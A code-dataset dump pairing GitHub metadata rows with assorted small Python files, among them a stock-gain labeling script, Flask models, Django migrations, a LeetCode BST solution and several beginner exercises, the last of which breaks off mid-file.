blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4f00ed6f7a1ecd6d17e60785586ac4cf6bcef125 | d4a86626745280e00985db69c11a5d07f5d648b1 | /amazon2/collect_testing_metadata.py | b9fb7474fbe027a40231e81e3804d76d3eeef8b2 | [] | no_license | galabing/stocks | 48df7692ab3779d558498c9d4d03c301c6759fc9 | 66088e481239c92104221e2c816b5b559d58ebf3 | refs/heads/master | 2021-01-21T02:46:14.109502 | 2013-11-11T22:26:51 | 2013-11-11T22:26:51 | 13,610,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,050 | py | #!/usr/bin/python
""" Collects testing metadata:
Given a cutoff date D, lookahead period L, sampling step S, sampling period
number P, collects the following metadata for training:
- for every S days after cutoff date D, up to period P, calculate
and sort gains for all stocks on that date
- classify gains into {+1, -1} classes
- output <date> <ticker> <label> <gain> <perc>
Set P to -1 to collect all available dates after cutoff.
Classification of gains into {+1, -1} is controlled by flags
--max_pos_rank, --min_neg_rank or --min_pos_gain, --max_neg_gain.
One and only one set of flags must be set.
Eg, setting max_pos_rank to 0.25 and min_neg_rank to 0.75 will result in
the top 25% gains being assigned +1, bottom 25% -1 and the 50% in between
dropped.
Eg, setting min_pos_gain to 0.1 and max_neg_gain to -0.1 will result in
stocks with 10+% gains being assigned +1, with 10+% losses being assigned
-1 and the ones in between dropped.
"""
import argparse
import pickle
BONUS = 0.01
MAX_GAIN = 10.0
def main():
  """Collect testing metadata: label per-date stock gains as +1/-1.

  Writes one header line plus one '<date> <ticker> <label> <gain%> <perc%>'
  line per labeled stock to --output_file (see module docstring).
  """
  parser = argparse.ArgumentParser()
  parser.add_argument('--date_file', required=True)
  parser.add_argument('--price_map_file', required=True)
  parser.add_argument('--cutoff_date', required=True)
  parser.add_argument('--lookahead', required=True)
  parser.add_argument('--sample_step', required=True)
  parser.add_argument('--sample_period', required=True)
  parser.add_argument('--max_pos_rank')
  parser.add_argument('--min_neg_rank')
  parser.add_argument('--min_pos_gain')
  parser.add_argument('--max_neg_gain')
  parser.add_argument('--output_file', required=True)
  args = parser.parse_args()
  lookahead = int(args.lookahead)
  step = int(args.sample_step)
  period = int(args.sample_period)
  assert lookahead > 0
  assert step > 0
  # Rank-based labeling: top max_pos_rank fraction -> +1, everything at or
  # below min_neg_rank -> -1, the middle band is dropped.
  max_pos_rank, min_neg_rank = None, None
  if args.max_pos_rank is not None and args.min_neg_rank is not None:
    max_pos_rank = float(args.max_pos_rank)
    min_neg_rank = float(args.min_neg_rank)
    assert max_pos_rank > 0 and max_pos_rank < 1
    assert min_neg_rank > 0 and min_neg_rank < 1
    assert max_pos_rank <= min_neg_rank
  # Threshold-based labeling: gain above min_pos_gain -> +1, gain below
  # max_neg_gain -> -1, anything in between is dropped.
  min_pos_gain, max_neg_gain = None, None
  if args.min_pos_gain is not None and args.max_neg_gain is not None:
    min_pos_gain = float(args.min_pos_gain)
    max_neg_gain = float(args.max_neg_gain)
    assert min_pos_gain >= max_neg_gain
  # Each set of flags must be set together, but the two sets are mutually
  # exclusive.
  assert (max_pos_rank is None) == (min_neg_rank is None)
  assert (min_pos_gain is None) == (max_neg_gain is None)
  assert (max_pos_rank is None) != (min_pos_gain is None)
  use_rank = max_pos_rank is not None
  # price_map: pickled mapping of date -> {ticker: price} (keys are dates,
  # per the lookups below).
  print 'Loading price map...'
  fp = open(args.price_map_file, 'rb')
  price_map = pickle.load(fp)
  fp.close()
  print 'Loaded price map with %d entries' % len(price_map)
  # Keep only the open dates that the price map covers and that fall
  # strictly after the cutoff date.
  min_date = min(price_map.keys())
  with open(args.date_file, 'r') as fp:
    open_dates = set([d for d in fp.read().splitlines() if d >= min_date])
  assert open_dates <= set(price_map.keys())
  dates = sorted([d for d in open_dates if d > args.cutoff_date])
  max_date = dates[-1]
  print '%d open dates between cutoff date %s and max date %s' % (
      len(dates), args.cutoff_date, max_date)
  if period > 0 and period < len(dates):
    dates = dates[:period]
  print '%d open dates within sampling period %s ... %s' % (
      len(dates), dates[0], dates[-1])
  with open(args.output_file, 'w') as fp:
    print >> fp, 'cutoff=%s lookahead=%d step=%d period=%d' % (
        args.cutoff_date, lookahead, step, period)
    for i in range(0, len(dates)-lookahead, step):
      print 'Processing sample date: %s' % dates[i]
      pm1 = price_map[dates[i]]
      pm2 = price_map[dates[i+lookahead]]
      gains = []
      for k, p1 in pm1.items():
        p2 = pm2.get(k)
        if p2 is None:
          # Ticker disappeared within the lookahead window: treat it as a
          # total loss instead of dropping the sample.
          p2 = 0.0
        # BONUS cushions the division for near-zero prices; gains are
        # capped at MAX_GAIN to limit the influence of outliers.
        gain = (p2-p1)/(p1+BONUS)
        gain = min(MAX_GAIN, gain)
        gains.append([k, gain])
      gains.sort(key=lambda gain: gain[1], reverse=True)
      if use_rank:
        max_pos = int(len(gains)*max_pos_rank)
        min_neg = int(len(gains)*min_neg_rank)
      else:
        # Threshold mode: scan the descending-sorted gains to find the
        # last index that still counts as positive and the index just
        # before the first negative.
        max_pos, min_neg = 0, len(gains)
        for j in range(len(gains)):
          if gains[j][1] > min_pos_gain:
            max_pos = j+1
          if gains[j][1] < max_neg_gain:
            min_neg = min(min_neg, j-1)
      # NOTE(review): in threshold mode with no gain below max_neg_gain,
      # min_neg stays len(gains) and gains[min_neg+1] below would be out
      # of range -- confirm inputs always contain losses.
      print ('%d gains calculated, %d pos (max=%.4f%%, min=%.4f%%)'
             ', %d neg (min=%.4f%%, max=%.4f%%)' % (
          len(gains), max_pos, gains[0][1]*100, gains[max_pos-1][1]*100,
          len(gains)-min_neg-1, gains[-1][1]*100, gains[min_neg+1][1]*100))
      # Emit: <date> <ticker> <label> <gain%> <rank percentile>.
      for j in range(max_pos):
        print >> fp, '%s %s +1 %.4f%% %.4f%%' % (
            dates[i], gains[j][0], gains[j][1]*100, j*100.0/len(gains))
      for j in range(min_neg+1, len(gains)):
        print >> fp, '%s %s -1 %.4f%% %.4f%%' % (
            dates[i], gains[j][0], gains[j][1]*100, j*100.0/len(gains))
if __name__ == '__main__':
main()
| [
"linyang@linyang-macbookpro.roam.corp.google.com"
] | linyang@linyang-macbookpro.roam.corp.google.com |
6604c81541758aaf235d202548008c6429c2a0ba | f6fd4ca884d9e33aa5afdf17b595a251299c8a6f | /06.03.2019/bagdas.py | d2046e20bac2b6f71cc24c85fd07fdc880abd082 | [] | no_license | unsalfurkanali/pythonCourse | 61c1f85e4bbf1f6543c9c30048287609cb4c8237 | 7e14b8b51e2056c9ce58bfe117b25317066ca3ff | refs/heads/master | 2020-04-25T23:57:34.182331 | 2019-03-07T10:50:31 | 2019-03-07T10:50:31 | 173,162,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 358 | py | def d(n):
tbt = 0
for i in range(1, n, 1):
if n % i == 0:
tbt = tbt + i
return tbt
# Scan every ordered pair (a, b) below 1000 and report the "bağdaş"
# (amicable) ones: the sum of proper divisors of each equals the other.
# Exactly like the original nested-if version, every amicable pair is
# printed twice (once per ordering); sayac keeps the running count.
sayac = 0
for a in range(1, 1000, 1):
    for b in range(1, 1000, 1):
        if a != b and d(a) == b and d(b) == a:
            sayac = sayac + 1
            print("{} ve {} bağdaş sayıdır".format(a, b))
print(sayac) | [
"unsalfurkanali@users.noreply.github.com"
] | unsalfurkanali@users.noreply.github.com |
42de88eb553c0e4e996822b8763fa6c13507faa7 | e5eeb6d9e7c2d7a53f864f8b9df7ca0cb79932ef | /sa/profiles/Alstec/MSPU/__init__.py | b7d0c1ced7d78897c77243798ea9274c7900e37e | [
"BSD-3-Clause"
] | permissive | 0pt1on/noc | aa583a6684f8299467c665e303f7ffa47ad6b88a | 4eb26dd44002a0a4a562973815567237d979cab5 | refs/heads/master | 2020-06-20T08:51:11.653330 | 2019-07-12T07:13:45 | 2019-07-12T07:13:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 599 | py | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Vendor: Alstec
# OS: MSPU
# ---------------------------------------------------------------------
# Copyright (C) 2007-2017 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC modules
from noc.core.profile.base import BaseProfile
class Profile(BaseProfile):
    """NOC SA profile for Alstec MSPU devices: CLI dialogue settings only."""
    name = "Alstec.MSPU"
    # Prompt looks like "<something>$> " (non-space run before "$> ").
    pattern_prompt = r"^\S+\$> "
    pattern_more = r"^--More-- or \(q\)uit$"
    pattern_syntax_error = r"\^ error"
    command_exit = "exit"
| [
"dmitryluhtionov@gmail.com"
] | dmitryluhtionov@gmail.com |
7a8b4e9165e31e186c5a6a10fd51e8e11d3c00d2 | bf13619dc6bdb211f224ae8e00b8005244bfe553 | /number8.py | 4cabcce24a4af79301e6c1c6823b94213c5384c6 | [] | no_license | dhSbid/apcsLabs | 749b72680d7013dfcbdf1525e2fc9c20d27b1680 | 46d1f11c33e46226f54fb5b94a35c143a8f13fc4 | refs/heads/main | 2023-02-11T09:35:08.332667 | 2021-01-10T04:42:59 | 2021-01-10T04:42:59 | 321,218,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py | def capFirstWord(sentence):
sList = sentence.split(". ")
for i in sList:
sList[i][0] = sList[i][0].toUpper()
newString = sList.join();
return newString
capFirstWord("hello. i am. bye. now for real.")
| [
"dh.sbid@students.srvusd.net"
] | dh.sbid@students.srvusd.net |
51068db68050eb59fde0721edcb025d1ceab1e15 | 66e298540c4c254912b5543baaa5a20830177f06 | /models.py | 0f6ea486d9d8832396df65a3b920808a457acc5c | [] | no_license | emm190/Monthly-Budgeter | a33acfd19b07d24295ea6abdd0ab05861ead4381 | b3db686437bf505e728fe4e139cf3d3dc0e2fd9d | refs/heads/main | 2023-02-03T07:49:12.338849 | 2020-12-20T06:12:16 | 2020-12-20T06:12:16 | 323,005,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,784 | py | #models
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
db = SQLAlchemy()
from sqlalchemy_serializer import SerializerMixin
#users, categories, purchases
#one user can make many purchases
#one purchase can only be purchased by one user
#let's just focus on user and purchase which is a one to many relationship
#user
class User(db.Model, SerializerMixin):
    """Account that owns purchases (one user -> many purchases)."""
    user_id = db.Column(db.Integer, primary_key=True) #standard primary key
    username = db.Column(db.String(60), nullable=False, unique=True) #unique username - cannot be blank
    password = db.Column(db.String(64), nullable=False) #password - hashed before saving to db & cannot be blank
    # Reverse side of the one-to-many: user.purchases lists Purchase rows,
    # and each Purchase gains a 'user' attribute through the backref.
    purchases = db.relationship('Purchase', backref='user')
    def __init__(self, username, password):
        self.username = username
        self.password = password
    def __repr__(self):
        return '<User {}>'.format(self.username)
# Association table backing the Purchase <-> Category many-to-many relation.
PurchaseCategory = db.Table('purchase_categories',
                            db.Column('id', db.Integer, primary_key=True),
                            db.Column('purchase_id', db.Integer, db.ForeignKey('purchases.purchase_id')),
                            db.Column('category_id', db.Integer, db.ForeignKey('categories.category_id')))
class Purchase(db.Model, SerializerMixin):
    """A single purchase made by a user, linkable to categories."""
    __tablename__ = 'purchases'
    purchase_id = db.Column(db.Integer, primary_key=True)
    amount_spent = db.Column(db.Float, nullable=False)
    name_of_purchase = db.Column(db.String(400), nullable=True)
    date_spent = db.Column(db.DateTime, nullable=False)
    category_name = db.Column(db.String(400), nullable=False)
    # Many-to-many link through the purchase_categories association table.
    category = db.relationship("Category", secondary=PurchaseCategory, backref=db.backref('purchases'))
    user_id = db.Column(db.Integer, db.ForeignKey('user.user_id'))
    # NOTE(review): 'users' duplicates the relationship that User.purchases'
    # backref ('user') already creates -- confirm both are intended.
    users = db.relationship(User)
    def __init__(self, amount_spent, name_of_purchase, date_spent, category_name, user_id):
        self.amount_spent = amount_spent
        self.name_of_purchase = name_of_purchase
        self.date_spent = date_spent
        self.category_name = category_name
        self.user_id = user_id
    def __repr__(self):
        return '<Purchase {}>'.format(self.name_of_purchase)
class Category(db.Model, SerializerMixin):
    """Spending category with an amount limit and the user who created it."""
    __tablename__ = 'categories'
    category_id = db.Column(db.Integer, primary_key=True)
    category_limit = db.Column(db.Float, nullable=False)
    category_name = db.Column(db.String(400), nullable=True)
    # Creator is stored by name, not as a foreign key to User.
    category_creator = db.Column(db.String(400), nullable=False)
    def __init__(self, category_limit, category_name, category_creator):
        self.category_limit = category_limit
        self.category_name = category_name
        self.category_creator = category_creator
    def __repr__(self):
        return '<Category {}>'.format(self.category_name)
| [
"noreply@github.com"
] | noreply@github.com |
7d4ad877ef0674f0248f5b402f5ca2ec0fbca0b5 | 83932f1d956a6b7818c6e58a31205e6e26f2fb5c | /0x11-python-network_1/2-post_email.py | ae506265afc23c32cdffd2a0428200f828ddb688 | [] | no_license | Nzparra/holbertonschool-higher_level_programming | a17834b8239e477a7284119acac69da0e7d7261e | 6cf7a44a10db7a10be3c3c02cbacfea9a7b897f2 | refs/heads/master | 2020-09-29T02:45:04.458850 | 2020-05-14T21:12:45 | 2020-05-14T21:12:45 | 226,930,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | #!/usr/bin/python3
""" sends a POST request to the passed URL with the email as a parameter """
from urllib import request, parse
import sys
if __name__ == "__main__":
req = parse.urlencode({'email': sys.argv[2]})
req = req.encode('ascii')
reqst = request.Request(sys.argv[1], req)
with request.urlopen(reqst) as response:
html = response.read()
print(html.decode('utf-8'))
| [
"nzparra@gmail.com"
] | nzparra@gmail.com |
99b9f127259fa1b88da83c73c1b13ae51336a33c | 20a3cc1106fa86fc2d45cd1728cc87d5db97e1f7 | /old/s3c/explosion.py | d214948ae8a509ca9fcf7d2f5cbf3d133373c71a | [] | no_license | sarahboufelja54/galatea | f5664f0b3117629b2c5bbe078a1bd52bb5e359e6 | 002a9f2905868be25b71770190fb2d5eda11c861 | refs/heads/master | 2020-12-04T13:45:07.697189 | 2018-12-12T16:27:09 | 2018-12-12T16:27:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 790 | py | #attempting to create an excitation-based explosion (I don't think it's possible)
# Two-unit toy model parameters; hat_* are the mean-field estimates being
# iterated below (assumed semantics from the S3C context -- see file header).
hat_h = [1., 1.]
alpha = [.01 , .01]
W = [ -1., 1. ]
beta = 1
# beta-scaled squared weights, one per unit.
w = [ beta * (weight ** 2) for weight in W ]
init_hat_s = [ 1., 1.5 ]
# Working copy of the s estimates (kept separate from the initial values).
hat_s = [ val for val in init_hat_s ]
#like mu in our current model, except that it isn't gated by h
always_on_mu = [ 0., 0. ]
v = 1
def update():
    # One synchronous sweep of the coupled updates: each unit's new hat_s
    # balances its mean and data terms against the other unit's current
    # contribution, scaled back by alpha[i] + w[i].
    new_hat_s = []
    for i in xrange(2):
        j = 1 - i
        numerator = (always_on_mu[i]
                     + beta * v * W[i]
                     - W[i] * W[j] * beta * hat_h[j] * hat_s[j])
        new_hat_s.append(numerator / (alpha[i] + w[i]))
    return new_hat_s
# Iterate the fixed-point update, printing hat_s each step to see whether
# the estimates settle or blow up (the "explosion" the file header mentions).
for iter in xrange(100):
    print hat_s
    hat_s = update()
| [
"goodfellow.ian@gmail.com"
] | goodfellow.ian@gmail.com |
cb7ad2618252a0667c0504b76cec1808499cb7db | f4ad60639b949cfb82d283b5e8900db38ab94dff | /oop/modules/parent.py | 83ab1f67fd032eb4c4ddd21b0cc8dd8988660c68 | [] | no_license | HavrylenkoM/homework | 16818e8e4f96c569976050cc3d507788db6a4855 | a703705634957fc3fa3fb76b5b8380600207e5ec | refs/heads/master | 2020-12-01T08:54:45.631490 | 2020-01-04T00:02:50 | 2020-01-04T00:02:50 | 230,596,290 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 754 | py | class Employee:
    def __init__(self, name, mail, phone, zp, time):
        """Store contact details, salary ('zp') and working time."""
        self.name = name
        self.mail = mail
        self.phone = phone
        self.salary = zp
        self.time = time
    # NOTE(review): dead prototype left from an earlier iteration;
    # 'day_count' is not defined anywhere visible.
    #def checksalary(self, days):
    #    if days == None:
    #        return self.salary * day_count
    #    return self.salary * days
    def work(self):
        """Return a short description of the employee's work routine."""
        return 'I come to office.'
    # Rich comparisons order employees by salary only.  NOTE(review):
    # defining __eq__ without __hash__ makes instances unhashable in Py3.
    def __lt__(self, other):
        return self.salary < other.salary
    def __gt__(self, other):
        return self.salary > other.salary
    def __eq__(self, other):
        return self.salary == other.salary
    def __le__(self, other):
        return self.salary <= other.salary
    def __ge__(self, other):
        return self.salary >= other.salary
| [
"mikegavrylenko@gmail.com"
] | mikegavrylenko@gmail.com |
e92404791804816246e695a517050fec3eab7da0 | 2c4cb21f9e9c7d885ed6e90c66b58e94420fc909 | /Programas em Phyton/Conversor de Temperatura.py | 6dc9d22e3e4f9b31614efd01d2bc4dd52a51d57c | [] | no_license | Thiago2123/Facul | 8cba318a3256f159c3d29ae7f8005431d481444b | 0987cd9d8f7d3dbe27da89c61a603d4a8310f97b | refs/heads/master | 2020-05-26T13:43:19.729026 | 2019-06-01T15:35:26 | 2019-06-01T15:35:26 | 188,251,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py |
# Read a Fahrenheit temperature from the user and print its Celsius value.
temperaturaF = input("Digite uma temp em Fahrennheit ")
graus_f = float(temperaturaF)
temperaturaC = (graus_f - 32) * 5 / 9
print("A temperatura em Celcius é", temperaturaC)
| [
"noreply@github.com"
] | noreply@github.com |
84ca08030eb010731c4720ff1fa52102c910d07d | 81b50896e6b47a508f070f57c535eb3c9deb2259 | /main.py | 36897e1d350f872c3696df55e39f3f1e7e509983 | [] | no_license | BrandtDavis/alberta_covid_data_pipeline | c1aff90b478906794eaf84b3a213d08a0b002550 | c7c1909a52b8aeba96de107fb440d1add7951d58 | refs/heads/main | 2023-08-25T10:53:57.177290 | 2021-10-10T18:49:09 | 2021-10-10T18:49:09 | 408,219,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 893 | py | # Author: Brandt Davis
# This file controls the program flow and functionality
from log_writer import Log_writer
import extract_data
import transform_data
import load_data
import log_writer
import visualize_data
def main():
    """Run the Alberta COVID data pipeline: extract, log, transform, plot."""
    # INITIALIZE OBJECTS
    extract = extract_data.Extract_data()
    transform = transform_data.Transform_data()
    load = load_data.Load_data()
    logger = log_writer.Log_writer()
    visualize = visualize_data.Visualize_data()
    # PIPELINE OPERATION
    # ==================
    # Retrieve files if they are outdated, log the extraction
    file_list = extract.retrieve_ab_csv_files()
    logger.log_data_extraction(file_list)
    # Reduce the raw stats to deaths-by-age and chart them.
    # NOTE(review): 'load' is constructed above but never used here.
    ab_covid_data = extract.get_alberta_covid_stats_dataframe()
    ab_covid_deaths = transform.get_deaths_by_age(ab_covid_data)
    visualize.create_bar_graph_of_data(ab_covid_deaths)
if __name__ == '__main__':
main() | [
"brandtd77@gmail.com"
] | brandtd77@gmail.com |
0bc0c6205078a53032cd587a1593d86b5eefc5bb | 570337818eaafd71370368dc28b5244784e9879d | /Assignment 3/ass3-8.py | 3b2d69ebd547cf36ae0f92a4df69968e9084fa88 | [] | no_license | rajatgarg2/rajatcode | be89f3ae4d74adebb45caf538594539b97553249 | e3c8077fc9e7da18f4fb9d7428a7c9ca72aca6ee | refs/heads/master | 2023-01-03T14:17:50.627678 | 2020-10-25T13:48:14 | 2020-10-25T13:48:14 | 284,300,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 494 | py | def spy_gamer(l):
c=0
len=l.__len__()
for i in range(len):
if l[i]==0:
c=1
break
if c==1:
for j in range(i+1,len):
if l[j]==0:
c=2
break
if c==2:
for k in range(j+1,len):
if l[k]==7:
return True
else:
return False
else:
return False
l=[1,2,3,0,0,7,5,4]
print(spy_gamer(l)) | [
"noreply@github.com"
] | noreply@github.com |
93b54ee7f652750ce07be3a5f26230012a9084b7 | 9f8c7677200974dd1456e62e855c438d2004f68d | /server/utils/exceptions.py | a44df0f5ae59c79af52ef1f8a8969e683bdb9c8e | [] | no_license | silentinfotech/LittleSense | 5f126ba92d6812b0ddce56073322b6dc8ea19b13 | 0f85bb629272cea09c04a3faef532ecb7f87a96e | refs/heads/master | 2020-07-22T18:50:59.662832 | 2019-05-03T10:44:19 | 2019-05-03T10:44:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py |
# Exception hierarchy for device/field/reading handling.  Each class derives
# from a matching builtin so generic handlers (KeyError, ValueError, ...)
# keep working.
class UnknownDevice(KeyError):
    """Raised when an unknown device id is used"""
class IllformedField(SyntaxError):
    """Raised when a field is not correctly formed"""
class UnknownFieldName(LookupError):
    """Raised when a field name is not known to be associated with a device"""
class InvalidFieldDataType(LookupError):
    """Raised when a field name contains an unknown data type"""
class InvalidUTCTimestamp(ValueError):
    """Raised when the passed UTC string cannot be parsed"""
class InvalidPacket(ValueError):
    """Raised when the packet formatter cannot parse the incoming data"""
class InvalidReadingsRequest(ValueError):
    """Raised when a request for readings has an invalid format"""
| [
"jacob@kittley.com"
] | jacob@kittley.com |
328266f06449ae540af5cc69bd820c5638df5007 | ab5b7c9b223860a5de21be7f50b38e328b8a4d1a | /Bookstore/migrations/0008_comment_date.py | 9b896966308f15124113cd8d028f85b734e1d964 | [
"Apache-2.0"
] | permissive | nuaaflash/NuaaOldBookStore | 9ebd9bc61324aa9fb82485671640a72603c1158c | 259f551a5fa97f2862745cb239c50d8ef87efe49 | refs/heads/master | 2020-04-07T10:55:46.334464 | 2018-11-21T00:23:07 | 2018-11-21T00:23:07 | 158,305,801 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.utils.timezone import utc
class Migration(migrations.Migration):
    """Add a non-null 'date' timestamp field to the Comment model."""
    dependencies = [
        ('Bookstore', '0007_auto_20150108_1426'),
    ]
    operations = [
        migrations.AddField(
            model_name='comment',
            name='date',
            # One-off default (the migration's creation time) back-fills
            # existing rows; preserve_default=False drops it afterwards.
            field=models.DateTimeField(default=datetime.datetime(2015, 1, 8, 14, 47, 23, 992507, tzinfo=utc)),
            preserve_default=False,
        ),
    ]
| [
"xh.yes@qq.com"
] | xh.yes@qq.com |
11e83bb3e66cac2f49bcbdc9f7ea9d2f86ba5af2 | def0712cb377ceee6f5fecf872846745130f3b61 | /main/migrations/0002_storagelogtype_name.py | 956fed1331f100166f7908a1e09aecf8f5115805 | [] | no_license | thewebcat/crm | 04fbd18083f41782552dea7836b8af395f8a4750 | f7424a266eabaa29a2c1ea25a5d24f13e4dfd44c | refs/heads/master | 2020-06-25T19:22:05.910165 | 2017-07-18T06:45:39 | 2017-07-18T06:45:39 | 96,983,205 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-12-26 15:21
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a required 'name' CharField to the StorageLogType model."""
    dependencies = [
        ('main', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='storagelogtype',
            name='name',
            # default=1 only back-fills existing rows (coerced to text);
            # preserve_default=False removes the default afterwards.
            field=models.CharField(default=1, max_length=255),
            preserve_default=False,
        ),
    ]
| [
"admin@web-server.fxbox.org"
] | admin@web-server.fxbox.org |
a8fa9c19001403543360c111212013e80ce6d390 | 45799ccc3a16c785ab3c65f3296d66f8463590dc | /docs/_downloads/7dfb273e58ce9eea02e428696e9a9672/q108.py | de3417bd434085db9999cb7596c5a4dfcfe82b2f | [
"MIT"
] | permissive | odys-z/hello | 9d29b7af68ea8c490b43994cf16d75c0e8ace08e | fedd0aec7273f3170aa77316d0d5f317cc18a979 | refs/heads/master | 2023-08-19T03:25:58.684050 | 2023-08-18T08:07:27 | 2023-08-18T08:07:27 | 154,006,292 | 0 | 0 | MIT | 2023-04-18T22:50:56 | 2018-10-21T12:34:12 | C++ | UTF-8 | Python | false | false | 1,496 | py | '''
108. Convert Sorted Array to Binary Search Tree
https://leetcode.com/problems/convert-sorted-array-to-binary-search-tree/
Given an integer array nums where the elements are sorted in ascending
order, convert it to a height-balanced binary search tree.
A height-balanced binary tree is a binary tree in which the depth of
the two subtrees of every node never differs by more than one.
Created on 17 Apr 2021
@author: Odys Zhou
'''
from unittest import TestCase
from typing import List
from utils.treehelper2 import TreeNode, list2tree
# Definition for a binary tree node.
class Solution:
    '''LeetCode 108 -- build a height-balanced BST from a sorted array.'''
    def sortedArrayToBST(self, nums: List[int]) -> TreeNode:
        '''Recursively take the middle element of each range as the root.

        Choosing the middle index keeps the left and right subtree sizes
        within one of each other, so the result is height-balanced.
        '''
        def build(lo, hi):
            # Empty index range -> no subtree.
            if lo > hi:
                return None
            mid = (lo + hi) // 2
            node = TreeNode(nums[mid])
            node.left = build(lo, mid - 1)
            node.right = build(mid + 1, hi)
            return node
        return build(0, len(nums) - 1)
if __name__ == "__main__":
t = TestCase()
s = Solution()
res =s.sortedArrayToBST([-10, -3, 0, 5, 9]).print()
t.assertTrue( list2tree([0, -3, 9, -10, None, 5]).print() == res or
list2tree([0, -10, 5, None, -3, None, 9]).print() == res)
print('q108 OK!')
| [
"odysseusj@163.com"
] | odysseusj@163.com |
72228121b096510616532a4edb9408df229e04ab | 5b9485c4ad9db15ff3e535085092fb45057f7364 | /src/nuxeo/javascript/cpsskins/tests/functional/treeview/browser.py | 6162bef9cd7e0d77dbb40da6b1080e30ac097356 | [
"ZPL-2.1"
] | permissive | nuxeo-cps/zope3--nuxeo.javascript | 06109541949c1e612b232efeddec3aa04ecb7d84 | 3ac03c8c46daf75ae7b3ff2fba308cba8caff245 | refs/heads/main | 2023-01-24T06:54:13.659442 | 2009-12-22T09:24:26 | 2009-12-22T09:24:26 | 317,995,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,947 | py |
from urllib import unquote
from zope.app.publisher.browser import BrowserView
from cpsskins import minjson as json
tree_data = {
'items': [
{'id': '1', 'title': 'item 1', 'depth': 1, 'type': 'inner'},
{'id': '2', 'title': 'item 2', 'depth': 2, 'type': 'inner',
'empty': True},
{'id': '3', 'title': 'item 3', 'depth': 2, 'type': 'leaf'},
{'id': '4', 'title': 'item 4', 'depth': 2, 'type': 'inner'},
{'id': '5', 'title': 'item 5', 'depth': 3, 'type': 'leaf',
'position': 'last'},
{'id': '6', 'title': 'item 6', 'depth': 1, 'type': 'inner'},
{'id': '7', 'title': 'item 7', 'depth': 2, 'type': 'inner',
'empty': True},
{'id': '8', 'title': 'item 8', 'depth': 2, 'type': 'leaf',
'position': 'last'},
]
}
MAX_DEPTH = 10
class Views(BrowserView):
    """Tree-view test views: serve tree items as JSON, honouring the
    per-client open/closed node state stored in a cookie."""
    def getTreeData(self):
        """Return the currently visible tree items as a JSON payload.

        Items nested under a collapsed inner node (state != 'open') are
        filtered out by remembering the depth below which items hide.
        """
        local_data = self._getLocalStorageData(1)
        if local_data is None:
            local_data = {}
        tree_state = local_data.get('state', {})
        filtered_items = []
        filter_depth = MAX_DEPTH
        for item in tree_data['items']:
            depth = item['depth']
            if depth > filter_depth:
                # Still inside a collapsed subtree: hide this item.
                continue
            else:
                # Back at/above the collapse point: stop filtering.
                filter_depth = MAX_DEPTH
            if item['type'] == 'inner':
                state = tree_state.get(item['id'])
                if state != 'open':
                    # Collapsed inner node: hide anything deeper than it.
                    filter_depth = depth
            filtered_items.append(item)
        self.request.response.setHeader('content-type', 'text/x-json')
        return json.write({'items': filtered_items})
    def setTreeData(self, data):
        # State travels via the cookie, so replying with the freshly
        # filtered tree is all that is needed here.
        return self.getTreeData()
    # TODO: moves this to an API
    def _getLocalStorageData(self, id):
        """Decode the 'local storage' cookie for storage *id*, or None."""
        value = self.request.cookies.get('cpsskins_local_storage_%s' % id)
        if value is not None:
            return json.read(unquote(value))
        return None
| [
"devnull@localhost"
] | devnull@localhost |
82e13c05761482ab49cd9c49c629ff150fe4a498 | b5025befdf74fff3071252abaa4db09479f2d763 | /Shanu_Abraham/10_aug_assignment_12/greater_no.py | 63f96575f11fe41f86239e36c7219bdfebe035b2 | [] | no_license | sidv/Assignments | d2fcc643a2963627afd748ff4d690907f01f71d8 | d50d668264e2a31581ce3c0544f9b13de18da2b3 | refs/heads/main | 2023-07-30T02:17:19.392164 | 2021-09-23T04:47:56 | 2021-09-23T04:47:56 | 392,696,356 | 1 | 20 | null | 2021-09-23T08:14:11 | 2021-08-04T13:20:43 | Python | UTF-8 | Python | false | false | 489 | py | # Program to find greatest no out of four nos
# Read four integers and report the strictly greatest one.  The chain
# mirrors the original exactly, so on ties the later candidate (ultimately
# num4) wins, just as before.
num1 = int(input("enter the 1st no"))
num2 = int(input("enter the 2nd no"))
num3 = int(input("enter the 3rd no"))
num4 = int(input("enter the 4th no"))
if num1 > num2 and num1 > num3 and num1 > num4:
    greatest = num1
elif num2 > num1 and num2 > num3 and num2 > num4:
